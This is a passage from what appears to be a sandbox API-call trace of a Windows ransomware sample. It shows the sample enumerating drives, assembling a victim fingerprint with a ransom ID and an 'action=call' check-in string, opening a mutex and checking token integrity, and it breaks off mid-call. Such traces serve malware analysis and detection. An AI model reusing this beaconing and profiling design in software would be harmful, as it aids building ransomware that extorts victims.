(in: param_1=0x1df0010, param_2="%I64u/" | out: param_1="549227327488/") returned 13 [0060.258] lstrlenW (lpString="C:FIXED_549227327488/") returned 21 [0060.258] wsprintfW (in: param_1=0x1df002a, param_2="%I64u" | out: param_1="17886330880") returned 11 [0060.259] lstrcatW (in: lpString1="C:FIXED_549227327488/17886330880", lpString2="," | out: lpString1="C:FIXED_549227327488/17886330880,") returned="C:FIXED_549227327488/17886330880," [0060.259] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0060.259] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0060.259] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0060.259] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0060.259] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0060.259] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0060.259] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0060.260] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0060.260] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0060.260] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0060.260] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0060.260] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0060.260] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0060.260] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0060.260] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0060.260] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0060.261] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0060.261] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0060.261] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0060.261] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0060.261] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0060.261] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0060.261] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0060.261] GetDriveTypeW (lpRootPathName="") returned 0x1 [0060.261] lstrlenW (lpString="C:FIXED_549227327488/17886330880,") returned 33 [0060.261] lstrlenW (lpString="CIiHmnxMn6Ps") returned 12 [0060.261] lstrlenW (lpString="pc_user") returned 7 [0060.261] lstrlenW (lpString="LHNIWSJ") returned 7 [0060.261] lstrlenW (lpString="pc_name") returned 7 [0060.261] lstrlenW (lpString="WORKGROUP") returned 9 [0060.261] lstrlenW (lpString="pc_group") returned 8 [0060.262] lstrlenW (lpString="en-US") returned 5 [0060.262] lstrlenW (lpString="pc_lang") returned 7 [0060.262] lstrlenW (lpString="0") returned 1 [0060.262] lstrlenW (lpString="pc_keyb") returned 7 [0060.262] lstrlenW (lpString="Windows 10 Pro") returned 14 [0060.262] lstrlenW (lpString="os_major") returned 8 [0060.262] lstrlenW (lpString="x64") returned 3 [0060.262] lstrlenW (lpString="os_bit") returned 6 [0060.262] lstrlenW (lpString="C:FIXED_549227327488/17886330880") returned 32 [0060.262] lstrlenW (lpString="hdd") returned 3 [0060.262] VirtualAlloc (lpAddress=0x0, dwSize=0x57a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e00000 [0060.262] lstrcatW (in: lpString1="", lpString2="pc_user" | out: lpString1="pc_user") returned="pc_user" [0060.262] lstrcatW (in: lpString1="pc_user", lpString2="=" | out: lpString1="pc_user=") returned="pc_user=" [0060.262] lstrcatW (in: lpString1="pc_user=", lpString2="CIiHmnxMn6Ps" | out: lpString1="pc_user=CIiHmnxMn6Ps") returned="pc_user=CIiHmnxMn6Ps" [0060.262] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&") returned="pc_user=CIiHmnxMn6Ps&" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&", lpString2="pc_name" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name") returned="pc_user=CIiHmnxMn6Ps&pc_name" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=") returned="pc_user=CIiHmnxMn6Ps&pc_name=" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=", lpString2="LHNIWSJ" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&", lpString2="pc_group" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=", lpString2="WORKGROUP" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&", lpString2="pc_lang" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=", lpString2="en-US" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&", lpString2="pc_keyb" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=", lpString2="0" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0" [0060.263] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&" [0060.264] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&", lpString2="os_major" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major" [0060.264] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=" [0060.264] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=", lpString2="Windows 10 Pro" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro" [0060.264] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&" [0060.264] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&", lpString2="os_bit" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit" [0060.264] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=" [0060.264] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=", lpString2="x64" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64" [0060.264] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&" [0060.264] VirtualAlloc (lpAddress=0x0, dwSize=0x42, flAllocationType=0x3000, flProtect=0x40) returned 0x1e10000 [0060.264] wsprintfW (in: param_1=0x1e10000, param_2="%x%x" | out: param_1="998a2f45d2ca4def") returned 16 [0060.264] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&", lpString2="ransom_id" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id" [0060.264] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=" [0060.265] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=", lpString2="998a2f45d2ca4def" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def" [0060.265] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&" [0060.265] VirtualFree (lpAddress=0x1e10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.265] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&", lpString2="hdd" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd" [0060.265] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=" [0060.265] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=", lpString2="C:FIXED_549227327488/17886330880" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880" [0060.265] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&" [0060.265] lstrlenW (lpString="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&") returned 179 [0060.265] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880", lpString2="&id=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=" [0060.265] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=", lpString2="64" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64" [0060.265] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64", lpString2="&sub_id=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=" [0060.265] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=", lpString2="872" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872" [0060.266] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872", lpString2="&version=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872&version=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872&version=" [0060.266] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872&version=", lpString2="5.2" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872&version=5.2") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872&version=5.2" [0060.266] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872&version=5.2", lpString2="&action=call" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872&version=5.2&action=call") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872&version=5.2&action=call" [0060.266] lstrlenW (lpString="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872&version=5.2&action=call") returned 219 [0060.266] lstrlenW (lpString="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=998a2f45d2ca4def&hdd=C:FIXED_549227327488/17886330880&id=64&sub_id=872&version=5.2&action=call") returned 219 [0060.266] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1e10000 [0060.266] lstrcpyA (in: lpString1=0x1e10000, lpString2=".oj=294~!z3)9n-1,8^)o((q22)lb$" | out: lpString1=".oj=294~!z3)9n-1,8^)o((q22)lb$") returned=".oj=294~!z3)9n-1,8^)o((q22)lb$" [0060.266] lstrlenA (lpString=".oj=294~!z3)9n-1,8^)o((q22)lb$") returned 30 [0060.266] VirtualFree (lpAddress=0x1e10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.266] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\iyAzNATdi7a94U8TAO7zVm5qzEjzks") returned 0x0 [0060.266] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0060.266] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0060.267] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0060.267] VerifyVersionInfoW (in: lpVersionInformation=0x19f914, dwTypeMask=0x23, dwlConditionMask=0x1801b | out: lpVersionInformation=0x19f914) returned 1 [0060.267] GetCurrentProcess () returned 0xffffffff [0060.267] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fa28 | out: TokenHandle=0x19fa28*=0x138) returned 1 [0060.267] GetTokenInformation (in: TokenHandle=0x138, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fa2c | out: TokenInformation=0x0, ReturnLength=0x19fa2c) returned 0 [0060.267] GetLastError () returned 0x7a [0060.267] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x4c6350 [0060.267] GetTokenInformation (in: TokenHandle=0x138, TokenInformationClass=0x19, TokenInformation=0x4c6350, TokenInformationLength=0x14, ReturnLength=0x19fa2c | out: TokenInformation=0x4c6350, ReturnLength=0x19fa2c) returned 1 [0060.267] GetSidSubAuthorityCount (pSid=0x4c6358*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x4c6359 [0060.267] GetSidSubAuthority (pSid=0x4c6358*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, 